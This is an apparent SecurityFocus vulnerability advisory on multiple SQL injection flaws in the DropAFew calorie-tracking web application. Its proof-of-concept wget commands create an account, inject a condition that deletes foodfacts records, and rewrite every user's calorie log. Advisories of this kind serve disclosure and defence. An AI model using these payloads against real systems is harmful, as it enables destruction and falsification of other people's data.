DropAFew Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

# create new user
wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php

# delete foodfacts table
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php

# make everyone have eaten 1000 strawberries, but hey, they were only 10

# calories ...
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*'
http://[target]/calorie/editlogcal.php


 

Privacy Statement
Copyright 2010, SecurityFocus